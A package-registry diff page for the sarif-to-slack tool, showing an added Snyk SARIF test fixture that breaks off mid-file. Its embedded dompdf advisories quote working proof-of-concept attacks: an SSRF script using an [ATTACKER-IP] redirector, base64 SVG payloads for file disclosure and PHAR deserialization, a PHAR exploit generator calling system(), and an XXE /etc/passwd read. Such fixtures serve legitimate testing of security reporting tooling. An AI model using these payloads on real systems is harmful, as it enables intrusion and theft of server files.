@fabasoad/sarif-to-slack 0.1.1 → 0.2.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (99) hide show
  1. package/.github/ISSUE_TEMPLATE/bug_report.md +1 -1
  2. package/.github/pull_request_template.md +3 -3
  3. package/.github/workflows/linting.yml +14 -0
  4. package/.github/workflows/release.yml +5 -1
  5. package/.github/workflows/send-sarif-to-slack.yml +214 -0
  6. package/.github/workflows/unit-tests.yml +1 -0
  7. package/.pre-commit-config.yaml +3 -3
  8. package/.tool-versions +1 -1
  9. package/CONTRIBUTING.md +1 -1
  10. package/Makefile +10 -3
  11. package/README.md +36 -5
  12. package/biome.json +15 -12
  13. package/dist/Logger.js +17 -6
  14. package/dist/Processors.js +23 -22
  15. package/dist/SarifToSlackService.d.ts.map +1 -1
  16. package/dist/SarifToSlackService.js +6 -7
  17. package/dist/SlackMessageBuilder.js +51 -55
  18. package/dist/index.d.ts +9 -4
  19. package/dist/index.d.ts.map +1 -1
  20. package/dist/index.js +10 -5
  21. package/dist/model/SarifModelPerRun.d.ts +17 -0
  22. package/dist/model/SarifModelPerRun.d.ts.map +1 -0
  23. package/dist/model/SarifModelPerRun.js +84 -0
  24. package/dist/model/SarifModelPerSarif.d.ts +20 -0
  25. package/dist/model/SarifModelPerSarif.d.ts.map +1 -0
  26. package/dist/model/SarifModelPerSarif.js +97 -0
  27. package/dist/model/types.d.ts +17 -0
  28. package/dist/model/types.d.ts.map +1 -0
  29. package/dist/model/types.js +31 -0
  30. package/dist/sarif-to-slack.d.ts +121 -18
  31. package/dist/tsdoc-metadata.json +1 -1
  32. package/dist/types.d.ts +107 -15
  33. package/dist/types.d.ts.map +1 -1
  34. package/dist/types.js +73 -7
  35. package/dist/utils/SarifUtils.d.ts +5 -0
  36. package/dist/utils/SarifUtils.d.ts.map +1 -0
  37. package/dist/utils/SarifUtils.js +32 -0
  38. package/dist/utils/SortUtils.d.ts +5 -0
  39. package/dist/utils/SortUtils.d.ts.map +1 -0
  40. package/dist/utils/SortUtils.js +8 -0
  41. package/dist/version.d.ts +2 -0
  42. package/dist/version.d.ts.map +1 -0
  43. package/dist/version.js +4 -0
  44. package/etc/sarif-to-slack.api.md +47 -9
  45. package/jest.config.json +4 -4
  46. package/package.json +14 -10
  47. package/scripts/save-version.sh +6 -0
  48. package/src/Logger.ts +22 -17
  49. package/src/Processors.ts +22 -22
  50. package/src/SarifToSlackService.ts +6 -7
  51. package/src/SlackMessageBuilder.ts +85 -68
  52. package/src/index.ts +17 -6
  53. package/src/model/SarifModelPerRun.ts +114 -0
  54. package/src/model/SarifModelPerSarif.ts +116 -0
  55. package/src/model/types.ts +31 -0
  56. package/src/types.ts +113 -15
  57. package/src/utils/SarifUtils.ts +44 -0
  58. package/src/utils/SortUtils.ts +21 -0
  59. package/src/version.ts +3 -0
  60. package/test-data/sarif/codeql-csharp.sarif +1 -0
  61. package/test-data/sarif/codeql-go.sarif +1 -0
  62. package/test-data/sarif/codeql-python.sarif +1 -0
  63. package/test-data/sarif/codeql-ruby.sarif +1 -0
  64. package/test-data/sarif/codeql-typescript.sarif +1 -0
  65. package/test-data/sarif/grype-container.sarif +1774 -0
  66. package/test-data/sarif/runs-1-tools-1-results-0.sarif +18 -0
  67. package/test-data/sarif/runs-2-tools-1-results-0.sarif +30 -0
  68. package/test-data/sarif/runs-2-tools-1.sarif +656 -0
  69. package/test-data/sarif/runs-2-tools-2-results-0.sarif +44 -0
  70. package/test-data/sarif/runs-2-tools-2.sarif +686 -0
  71. package/test-data/sarif/runs-3-tools-2-results-0.sarif +48 -0
  72. package/test-data/sarif/runs-3-tools-2.sarif +278 -0
  73. package/test-data/sarif/snyk-composer.sarif +934 -0
  74. package/test-data/sarif/snyk-container.sarif +313 -0
  75. package/test-data/sarif/snyk-gomodules.sarif +388 -0
  76. package/test-data/sarif/snyk-gradle.sarif +274 -0
  77. package/test-data/sarif/snyk-hex.sarif +66 -0
  78. package/test-data/sarif/snyk-maven.sarif +274 -0
  79. package/test-data/sarif/snyk-npm.sarif +896 -0
  80. package/test-data/sarif/snyk-nuget.sarif +90 -0
  81. package/test-data/sarif/snyk-pip.sarif +66 -0
  82. package/test-data/sarif/snyk-pnpm.sarif +90 -0
  83. package/test-data/sarif/snyk-poetry.sarif +1952 -0
  84. package/test-data/sarif/snyk-rubygems.sarif +440 -0
  85. package/test-data/sarif/snyk-sbt.sarif +178 -0
  86. package/test-data/sarif/snyk-swift.sarif +112 -0
  87. package/test-data/sarif/snyk-yarn.sarif +2900 -0
  88. package/test-data/sarif/trivy-iac.sarif +134 -0
  89. package/test-data/sarif/wiz-container.sarif +30916 -0
  90. package/test-data/sarif/wiz-iac.sarif +558 -0
  91. package/tests/Processors.spec.ts +3 -3
  92. package/tests/integration/SendSarifToSlack.spec.ts +56 -0
  93. package/tsconfig.json +14 -14
  94. package/dist/Logger.js.map +0 -1
  95. package/dist/Processors.js.map +0 -1
  96. package/dist/SarifToSlackService.js.map +0 -1
  97. package/dist/SlackMessageBuilder.js.map +0 -1
  98. package/dist/index.js.map +0 -1
  99. package/dist/types.js.map +0 -1
package/test-data/sarif/snyk-composer.sarif ADDED
@@ -0,0 +1,934 @@
1
+ {
2
+ "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/master/Schemata/sarif-schema-2.1.0.json",
3
+ "version": "2.1.0",
4
+ "runs": [
5
+ {
6
+ "tool": {
7
+ "driver": {
8
+ "name": "Snyk Open Source",
9
+ "properties": {
10
+ "artifactsScanned": 17
11
+ },
12
+ "rules": [
13
+ {
14
+ "id": "SNYK-PHP-DOMPDFDOMPDF-2428942",
15
+ "shortDescription": {
16
+ "text": "High severity - Remote Code Execution (RCE) vulnerability in dompdf/dompdf"
17
+ },
18
+ "fullDescription": {
19
+ "text": "(CVE-2022-28368) dompdf/dompdf@1.2.0"
20
+ },
21
+ "help": {
22
+ "text": "",
23
+ "markdown": "* Package Manager: composer\n* Vulnerable module: dompdf/dompdf\n* Introduced through: snyk/phpgoof@0.0.0 and dompdf/dompdf@1.2.0\n### Detailed paths\n* _Introduced through_: snyk/phpgoof@0.0.0 › dompdf/dompdf@1.2.0\n# Overview\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) by injecting `CSS` into the data. The file can be tricked into storing a malicious font with a `.php` file extension in its font cache, which can later be executed by accessing it from the web.\n# Remediation\nUpgrade `dompdf/dompdf` to version 1.2.1 or higher.\n# References\n- [Blog](https://positive.security/blog/dompdf-rce)\n- [Github Commit](https://github.com/dompdf/dompdf/pull/2808/commits/00b2b360ace768d58430f1cc5a20cb43d58bbc1a)\n- [Github Issues](https://github.com/dompdf/dompdf/issues/2598)\n- [GitHub Release](https://github.com/dompdf/dompdf/releases/tag/v1.2.1)\n- [Exploit DB](https://www.exploit-db.com/exploits/51270)\n"
24
+ },
25
+ "properties": {
26
+ "tags": [
27
+ "security",
28
+ "CWE-94",
29
+ "composer"
30
+ ],
31
+ "cvssv3_baseScore": 8.1,
32
+ "security-severity": "8.1"
33
+ }
34
+ },
35
+ {
36
+ "id": "SNYK-PHP-DOMPDFDOMPDF-2936790",
37
+ "shortDescription": {
38
+ "text": "High severity - Server-side Request Forgery (SSRF) vulnerability in dompdf/dompdf"
39
+ },
40
+ "fullDescription": {
41
+ "text": "(CVE-2022-0085) dompdf/dompdf@1.2.0"
42
+ },
43
+ "help": {
44
+ "text": "",
45
+ "markdown": "* Package Manager: composer\n* Vulnerable module: dompdf/dompdf\n* Introduced through: snyk/phpgoof@0.0.0 and dompdf/dompdf@1.2.0\n### Detailed paths\n* _Introduced through_: snyk/phpgoof@0.0.0 › dompdf/dompdf@1.2.0\n# Overview\n\nAffected versions of this package are vulnerable to Server-side Request Forgery (SSRF). When DomPDF is being used with `isRemoteEnabled` and `allow_url_fopen` set to `true`, and the IP addresses are restricted via a deny list, it is possible for an attacker to pass in a URL which bypasses this deny list but serves a 302 redirect response to a restricted IP address.\r\n\r\n\r\n# PoC:\r\n\r\npoc.php\r\n\r\n```php\r\n<?php\r\n\r\n//URL variable\r\n\r\n$url = \"http://[ATTACKER-IP]\";\r\n\r\nrequire_once 'dompdf/autoload.inc.php'; \r\n\r\nuse Dompdf\\Dompdf;\r\nuse Dompdf\\Options;\r\n\r\n$options = new Options();\r\n$options->set('isRemoteEnabled', true);\r\n\r\n$dompdf = new Dompdf($options);\r\n\r\n$host = parse_url($url, PHP_URL_HOST);\r\n$ip = gethostbyname($host);\r\n\r\nif ($ip !== \"127.0.0.1\") {\r\n $dompdf->loadHtmlFile($url);\r\n $dompdf->setPaper('A4', 'landscape'); \r\n $dompdf->render(); \r\n $dompdf->stream(); \r\n}\r\n\r\n?>\r\n```\r\n\r\nredirector.py - hosted on `http://[ATTACKER-IP]`\r\n\r\n```python\r\nimport sys\r\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\r\n\r\nif len(sys.argv)-1 != 2:\r\n print(\"Usage: {} <port_number> <url>\".format(sys.argv[0]))\r\n sys.exit()\r\n\r\nclass Redirect(BaseHTTPRequestHandler):\r\n def do_GET(self):\r\n self.send_response(302)\r\n self.send_header('Location', sys.argv[2])\r\n self.end_headers()\r\n\r\nHTTPServer((\"\", int(sys.argv[1])), Redirect).serve_forever()\r\n```\n# Remediation\nUpgrade `dompdf/dompdf` to version 2.0.0 or higher.\n# References\n- [GitHub Commit](https://github.com/dompdf/dompdf/commit/bb1ef65011a14730b7cfbe73506b4bb8a03704bd)\n- [GitHub PR](https://github.com/dompdf/dompdf/pull/2859)\n"
46
+ },
47
+ "properties": {
48
+ "tags": [
49
+ "security",
50
+ "CWE-918",
51
+ "composer"
52
+ ],
53
+ "cvssv3_baseScore": 3.7,
54
+ "security-severity": "3.7"
55
+ }
56
+ },
57
+ {
58
+ "id": "SNYK-PHP-DOMPDFDOMPDF-2953235",
59
+ "shortDescription": {
60
+ "text": "Medium severity - External Control of File Name or Path vulnerability in dompdf/dompdf"
61
+ },
62
+ "fullDescription": {
63
+ "text": "(CVE-2022-2400) dompdf/dompdf@1.2.0"
64
+ },
65
+ "help": {
66
+ "text": "",
67
+ "markdown": "* Package Manager: composer\n* Vulnerable module: dompdf/dompdf\n* Introduced through: snyk/phpgoof@0.0.0 and dompdf/dompdf@1.2.0\n### Detailed paths\n* _Introduced through_: snyk/phpgoof@0.0.0 › dompdf/dompdf@1.2.0\n# Overview\n\nAffected versions of this package are vulnerable to External Control of File Name or Path due to insufficient URI validation in `src/Image/Cache.php`, which allows an attacker to retrieve image files from the affected system.\n# Remediation\nUpgrade `dompdf/dompdf` to version 2.0.0 or higher.\n# References\n- [GitHub Commit](https://github.com/dompdf/dompdf/commit/99aeec1efec9213e87098d42eb09439e7ee0bb6a)\n- [GitHub PR](https://github.com/dompdf/dompdf/pull/1903)\n"
68
+ },
69
+ "properties": {
70
+ "tags": [
71
+ "security",
72
+ "CWE-73",
73
+ "composer"
74
+ ],
75
+ "cvssv3_baseScore": 5.3,
76
+ "security-severity": "5.3"
77
+ }
78
+ },
79
+ {
80
+ "id": "SNYK-PHP-DOMPDFDOMPDF-3033151",
81
+ "shortDescription": {
82
+ "text": "High severity - PHP Remote File Inclusion vulnerability in dompdf/dompdf"
83
+ },
84
+ "fullDescription": {
85
+ "text": "(CVE-2022-41343) dompdf/dompdf@1.2.0"
86
+ },
87
+ "help": {
88
+ "text": "",
89
+ "markdown": "* Package Manager: composer\n* Vulnerable module: dompdf/dompdf\n* Introduced through: snyk/phpgoof@0.0.0 and dompdf/dompdf@1.2.0\n### Detailed paths\n* _Introduced through_: snyk/phpgoof@0.0.0 › dompdf/dompdf@1.2.0\n# Overview\n\nAffected versions of this package are vulnerable to PHP Remote File Inclusion via `registerFont` in `FontMetrics.php`, due to a URI validation failure which does not halt font registration.\n# Remediation\nUpgrade `dompdf/dompdf` to version 2.0.1 or higher.\n# References\n- [GitHub Commit](https://github.com/dompdf/dompdf/commit/66431c58017d5b1bdb9f6f772b9fbbc5e3d38dc2)\n- [GitHub Issue](https://github.com/dompdf/dompdf/issues/2994)\n- [GitHub PR](https://github.com/dompdf/dompdf/pull/2995)\n- [GitHub Release](https://github.com/dompdf/dompdf/releases/tag/v2.0.1)\n"
90
+ },
91
+ "properties": {
92
+ "tags": [
93
+ "security",
94
+ "CWE-98",
95
+ "composer"
96
+ ],
97
+ "cvssv3_baseScore": 7.3,
98
+ "security-severity": "7.3"
99
+ }
100
+ },
101
+ {
102
+ "id": "SNYK-PHP-DOMPDFDOMPDF-3261241",
103
+ "shortDescription": {
104
+ "text": "High severity - Incorrect Behavior Order: Authorization Before Parsing and Canonicalization vulnerability in dompdf/dompdf"
105
+ },
106
+ "fullDescription": {
107
+ "text": "(CVE-2023-23924) dompdf/dompdf@1.2.0"
108
+ },
109
+ "help": {
110
+ "text": "",
111
+ "markdown": "* Package Manager: composer\n* Vulnerable module: dompdf/dompdf\n* Introduced through: snyk/phpgoof@0.0.0 and dompdf/dompdf@1.2.0\n### Detailed paths\n* _Introduced through_: snyk/phpgoof@0.0.0 › dompdf/dompdf@1.2.0\n# Overview\n\nAffected versions of this package are vulnerable to Incorrect Behavior Order: Authorization Before Parsing and Canonicalization due to URI validation failure when parsing SVG. The URI validation can be bypassed on SVG parsing by passing `<image>` tags with uppercase letters.\r\n\r\n# Vulnerable Behaviour\r\n\r\n```\r\nif ($type === \"svg\") {\r\n $parser = xml_parser_create(\"utf-8\");\r\n xml_parser_set_option($parser, XML_OPTION_CASE_FOLDING, false);\r\n xml_set_element_handler(\r\n $parser,\r\n function ($parser, $name, $attributes) use ($options, $parsed_url, $full_url) {\r\n if ($name === \"image\") {\r\n $attributes = array_change_key_case($attributes, CASE_LOWER);\r\n```\r\nThis part will try to detect `<image>` tags in SVG, and will take the `href` to validate it against the `protocolAllowed` whitelist. However, the `$name` comparison with `image` is case sensitive, which means that such a tag in the SVG will pass : \r\n\r\n```\r\n<svg>\r\n <Image xlink:href=\"phar:///foo\"></Image>\r\n</svg>\r\n```\r\n\r\nAs the tag is named `Image` and not `image`, it will not pass the condition to trigger the check.\r\n\r\nA correct solution would be to `strtolower` the `$name` before the check : \r\n\r\n```\r\nif (strtolower($name) === \"image\") {\r\n```\r\n\r\n# PoC\r\n\r\nParsing the following SVG file is sufficient to reproduce the vulnerability :\r\n\r\n```\r\n<svg>\r\n <Image xlink:href=\"phar:///foo\"></Image>\r\n</svg>\r\n```\n# Remediation\nUpgrade `dompdf/dompdf` to version 2.0.2 or higher.\n# References\n- [GitHub Commit](https://github.com/dompdf/dompdf/commit/7558f07f693b2ac3266089f21051e6b78c6a0c85)\n- [GitHub Release](https://github.com/dompdf/dompdf/releases/tag/v2.0.2)\n"
112
+ },
113
+ "properties": {
114
+ "tags": [
115
+ "security",
116
+ "CWE-551",
117
+ "composer"
118
+ ],
119
+ "cvssv3_baseScore": 8.3,
120
+ "security-severity": "8.3"
121
+ }
122
+ },
123
+ {
124
+ "id": "SNYK-PHP-DOMPDFDOMPDF-3315269",
125
+ "shortDescription": {
126
+ "text": "High severity - Improper Input Validation vulnerability in dompdf/dompdf"
127
+ },
128
+ "fullDescription": {
129
+ "text": "(CVE-2023-24813) dompdf/dompdf@1.2.0"
130
+ },
131
+ "help": {
132
+ "text": "",
133
+ "markdown": "* Package Manager: composer\n* Vulnerable module: dompdf/dompdf\n* Introduced through: snyk/phpgoof@0.0.0 and dompdf/dompdf@1.2.0\n### Detailed paths\n* _Introduced through_: snyk/phpgoof@0.0.0 › dompdf/dompdf@1.2.0\n# Overview\n\nAffected versions of this package are vulnerable to Improper Input Validation when validating URI strings to parse SVG files in `Image/Cache.php`. This allows calling arbitrary URLs with arbitrary protocols. This is a bypass of CVE-2023-23924.\r\n\r\n**Note:** This is exploitable in PHP before version 8.0.0.\n# Remediation\nUpgrade `dompdf/dompdf` to version 2.0.3 or higher.\n# References\n- [GitHub Commit](https://github.com/dompdf/dompdf/commit/95009ea98230f9b084b040c34e3869ef3dccc9aa)\n"
134
+ },
135
+ "properties": {
136
+ "tags": [
137
+ "security",
138
+ "CWE-20",
139
+ "composer"
140
+ ],
141
+ "cvssv3_baseScore": 8.3,
142
+ "security-severity": "8.3"
143
+ }
144
+ },
145
+ {
146
+ "id": "SNYK-PHP-DOMPDFDOMPDF-6124861",
147
+ "shortDescription": {
148
+ "text": "High severity - Improper Input Validation vulnerability in dompdf/dompdf"
149
+ },
150
+ "fullDescription": {
151
+ "text": "(CVE-2023-50262) dompdf/dompdf@1.2.0"
152
+ },
153
+ "help": {
154
+ "text": "",
155
+ "markdown": "* Package Manager: composer\n* Vulnerable module: dompdf/dompdf\n* Introduced through: snyk/phpgoof@0.0.0 and dompdf/dompdf@1.2.0\n### Detailed paths\n* _Introduced through_: snyk/phpgoof@0.0.0 › dompdf/dompdf@1.2.0\n# Overview\n\nAffected versions of this package are vulnerable to Improper Input Validation via the SVG image parsing process. An attacker can send multiple requests that trigger infinite recursion through chained references between two or more SVG images, leading to memory exhaustion and potential system unresponsiveness.\n# PoC\nrecurse.html\r\n\r\n```php\r\n\r\n<img src=\"one.svg\">\r\n\r\n```\r\n\r\none.svg\r\n\r\n\r\n```php\r\n\r\n<svg width=\"200\" height=\"200\" xmlns=\"http://www.w3.org/2000/svg\">\r\n <image href=\"two.svg\" />\r\n</svg>\r\n\r\n```\r\n\r\ntwo.svg\r\n\r\n```php\r\n\r\n<svg width=\"200\" height=\"200\" xmlns=\"http://www.w3.org/2000/svg\">\r\n <image href=\"one.svg\" />\r\n</svg>\r\n\r\n```\n# Remediation\nUpgrade `dompdf/dompdf` to version 2.0.4 or higher.\n# References\n- [GitHub Commit](https://github.com/dompdf/dompdf/commit/41cbac16f3cf56affa49f06e8dae66d0eac2b593)\n- [GitHub Release](https://github.com/dompdf/dompdf/releases/tag/v2.0.4)\n- [Vulnerable Code](https://github.com/dompdf/dompdf/blob/v2.0.3/src/Image/Cache.php#L136-L153)\n"
156
+ },
157
+ "properties": {
158
+ "tags": [
159
+ "security",
160
+ "CWE-20",
161
+ "composer"
162
+ ],
163
+ "cvssv3_baseScore": 7.5,
164
+ "security-severity": "7.5"
165
+ }
166
+ },
167
+ {
168
+ "id": "SNYK-PHP-DOMPDFDOMPDF-8382096",
169
+ "shortDescription": {
170
+ "text": "Critical severity - XML External Entity (XXE) Injection vulnerability in dompdf/dompdf"
171
+ },
172
+ "fullDescription": {
173
+ "text": "(CVE-2021-3902) dompdf/dompdf@1.2.0"
174
+ },
175
+ "help": {
176
+ "text": "",
177
+ "markdown": "* Package Manager: composer\n* Vulnerable module: dompdf/dompdf\n* Introduced through: snyk/phpgoof@0.0.0 and dompdf/dompdf@1.2.0\n### Detailed paths\n* _Introduced through_: snyk/phpgoof@0.0.0 › dompdf/dompdf@1.2.0\n# Overview\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection through the SVG parser. An attacker can perform server-side request forgery, disclose internal image files, and execute PHAR deserialization attacks by manipulating XML input.\n\n**Note:**\n\nThis vulnerability is exploitable even if the `isRemoteEnabled` option is set to false.\n# PoC\n**Payload 1 - SSRF (only allow_url_fopen required)**\n\nThis embeds Google logo into the PDF document even when the `isRemoteEnabled` option is defaulted to false.\n\n```php\n<?php\n// Include autoloader \nrequire_once 'dompdf/autoload.inc.php'; \n\n// Reference the Dompdf namespace \nuse Dompdf\\Dompdf; \n\n$dompdf = new Dompdf();\n// Load HTML content \n$dompdf->loadHtml('<img src=\"data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0YW5kYWxvbmU9Im5vIj8+CjxzdmcgeG1sbnM6c3ZnPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxuczp4bGluaz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluayIgd2lkdGg9IjIwMCIgaGVpZ2h0PSIyMDAiPgo8aW1hZ2UgaGVpZ2h0PSIyMDAiIHdpZHRoPSIyMDAiIHhsaW5rOmhyZWY9Imh0dHBzOi8vd3d3Lmdvb2dsZS5jb20vaW1hZ2VzL2JyYW5kaW5nL2dvb2dsZWxvZ28vMXgvZ29vZ2xlbG9nb19jb2xvcl8yNzJ4OTJkcC5wbmciIC8+Cjwvc3ZnPg==\">');\n\n// (Optional) Setup the paper size and orientation\n$dompdf->setPaper('A4', 'landscape'); \n \n// Render the HTML as PDF \n$dompdf->render(); \n \n// Output the generated PDF to Browser \n$dompdf->stream(); \n\n?>\n```\n\n**Payload 2 - Image File disclosure (no requirements)**\n\nThis causes the `/var/www/html/index.jpg` file to be included into the file.\n\n```php\n<?php\n// Include autoloader \nrequire_once 'dompdf/autoload.inc.php'; \n\n// Reference the Dompdf namespace \nuse Dompdf\\Dompdf; \n\n$dompdf = new Dompdf();\n// Load HTML content \n$dompdf->loadHtml('<img src=\"data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0YW5kYWxvbmU9Im5vIj8+CjxzdmcgeG1sbnM6c3ZnPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxuczp4bGluaz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluayIgd2lkdGg9IjIwMCIgaGVpZ2h0PSIyMDAiPgo8aW1hZ2UgaGVpZ2h0PSIyMDAiIHdpZHRoPSIyMDAiIHhsaW5rOmhyZWY9ImZpbGU6Ly8vdmFyL3d3dy9odG1sL2luZGV4LmpwZyIgLz4KPC9zdmc+\">');\n\n// (Optional) Setup the paper size and orientation\n$dompdf->setPaper('A4', 'landscape'); \n \n// Render the HTML as PDF \n$dompdf->render(); \n \n// Output the generated PDF to Browser \n$dompdf->stream(); \n\n?>\n```\n\n**Payload 3 - Insecure PHAR deserialization (only file upload of phar file required [can change extension])**\n\n```php\n<?php\n// Include autoloader \nrequire_once 'dompdf/autoload.inc.php'; \n\ninclude(\"phar-poc.php\");\n\n// Reference the Dompdf namespace \nuse Dompdf\\Dompdf; \n\n$dompdf = new Dompdf();\n\n// Load HTML content \n$dompdf->loadHtml('<img src=\"data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0YW5kYWxvbmU9Im5vIj8+CjxzdmcgeG1sbnM6c3ZnPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxuczp4bGluaz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluayIgd2lkdGg9IjIwMCIgaGVpZ2h0PSIyMDAiPgo8aW1hZ2UgaGVpZ2h0PSIyMDAiIHdpZHRoPSIyMDAiIHhsaW5rOmhyZWY9InBoYXI6Ly8vdmFyL3d3dy9odG1sL3Rlc3QucGhhci90ZXN0LnR4dCIgLz4KPC9zdmc+\">');\n\n// (Optional) Setup the paper size and orientation\n$dompdf->setPaper('A4', 'landscape'); \n \n// Render the HTML as PDF \n$dompdf->render(); \n \n// Output the generated PDF to Browser \n$dompdf->stream(); \n\n?>\n```\n\n# Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n<xml>\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\n <username>John</username>\n</xml>\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n<xml>\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\n<!DOCTYPE foo [\n <!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]>\n <username>&xxe;</username>\n</xml>\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n# Remediation\nUpgrade `dompdf/dompdf` to version 2.0.0 or higher.\n# References\n- [GitHub Commit](https://github.com/dompdf/dompdf/commit/f56bc8e40be6c0ae0825e6c7396f4db80620b799)\n- [Vulnerable Code](https://github.com/dompdf/dompdf/blob/0ccafeb142dd04f556b43f1e8b5541aa06de1c26/src/Adapter/PDFLib.php#L1213-L1226)\n"
178
+ },
179
+ "properties": {
180
+ "tags": [
181
+ "security",
182
+ "CWE-611",
183
+ "composer"
184
+ ],
185
+ "cvssv3_baseScore": 9.3,
186
+ "security-severity": "9.3"
187
+ }
188
+ },
189
+ {
190
+ "id": "SNYK-PHP-DOMPDFDOMPDF-8382097",
191
+ "shortDescription": {
192
+ "text": "Critical severity - Deserialization of Untrusted Data vulnerability in dompdf/dompdf"
193
+ },
194
+ "fullDescription": {
195
+ "text": "(CVE-2021-3838) dompdf/dompdf@1.2.0"
196
+ },
197
+ "help": {
198
+ "text": "",
199
+ "markdown": "* Package Manager: composer\n* Vulnerable module: dompdf/dompdf\n* Introduced through: snyk/phpgoof@0.0.0 and dompdf/dompdf@1.2.0\n### Detailed paths\n* _Introduced through_: snyk/phpgoof@0.0.0 › dompdf/dompdf@1.2.0\n# Overview\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data through the `file_get_contents` function. An attacker can execute arbitrary code by uploading a file with a malicious `phar://` protocol, leading to the deserialization and instantiation of arbitrary PHP objects.\n\n**Note:**\n\nThis can lead to remote code execution, especially when DOMPdf is used with frameworks with documented POP chains like Laravel or vulnerable developer code.\n# PoC\nSetup the following code in `/var/www/html`: `vuln.php` represents the use of DOMPdf functions and `phar-poc.php` represents code with a vulnerable POP chain.\n\n```php\n// vuln.php\n<?php\n// Include autoloader \nrequire_once 'dompdf/autoload.inc.php'; \n\n// Include vulnerable objects\ninclude(\"phar-poc.php\");\n\n// Reference the Dompdf namespace \nuse Dompdf\\Dompdf; \nuse Dompdf\\Options;\n\n$options = new Options();\n$options->set('isRemoteEnabled', true);\n$dompdf = new Dompdf($options);\n\n// Load HTML content \n$dompdf->loadHtml('<img src=\"phar://test.phar\">'); \n// (Optional) Setup the paper size and orientation \n$dompdf->setPaper('A4', 'landscape'); \n \n// Render the HTML as PDF \n$dompdf->render(); \n \n// Output the generated PDF to Browser \n//$dompdf->stream(); \n\n?>\n```\n\n```php\n// phar-poc.php\n<?php\n\nclass AnyClass {\n public $data = null;\n public function __construct($data) {\n $this->data = $data;\n }\n\n function __destruct() {\n system($this->data);\n }\n}\n```\n\nThe PHAR payload is generated using the following exploit script:\n\n```php\n<?php\n\nclass AnyClass {\n public $data = null;\n public function __construct($data) {\n $this->data = $data;\n }\n\n function __destruct() {\n system($this->data);\n }\n}\n\n// create new Phar\n$phar = new Phar('test.phar');\n$phar->startBuffering();\n$phar->addFromString('test.txt', 'text');\n$phar->setStub(\"\\xff\\xd8\\xff\\n<?php __HALT_COMPILER(); ?>\");\n\n// add object of any class as meta data\n$object = new AnyClass('whoami');\n$phar->setMetadata($object);\n$phar->stopBuffering();\n```\n\nGenerate with:\n\n```php\nphp --define phar.readonly=0 create_phar.php\n```\n\nand execute `vuln.php` with `php vuln.php`, noticing `whoami` being executed\n\nNote that after generating the PHAR exploit code, an attacker can rename it to whatever extension or filename they want, it is possible to rename it `test.phar` to `test.png` to bypass any file extension check by the developer and specify `phar://test.png` in the src attribute.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, thus allowing the attacker to control the state or the flow of the execution.\n \n# Remediation\nUpgrade `dompdf/dompdf` to version 2.0.0 or higher.\n# References\n- [GitHub Commit](https://github.com/dompdf/dompdf/commit/99aeec1efec9213e87098d42eb09439e7ee0bb6a)\n- [Vulnerable Code](https://github.com/dompdf/dompdf/blob/master/src/Helpers.php#L853L871)\n"
200
+ },
201
+ "properties": {
202
+ "tags": [
203
+ "security",
204
+ "CWE-502",
205
+ "composer"
206
+ ],
207
+ "cvssv3_baseScore": 9.3,
208
+ "security-severity": "9.3"
209
+ }
210
+ },
211
+ {
212
+ "id": "SNYK-PHP-LEAGUECOMMONMARK-173996",
213
+ "shortDescription": {
214
+ "text": "Medium severity - Cross-site Scripting (XSS) vulnerability in league/commonmark"
215
+ },
216
+ "fullDescription": {
217
+ "text": "league/commonmark@0.18.2"
218
+ },
219
+ "help": {
220
+ "text": "",
221
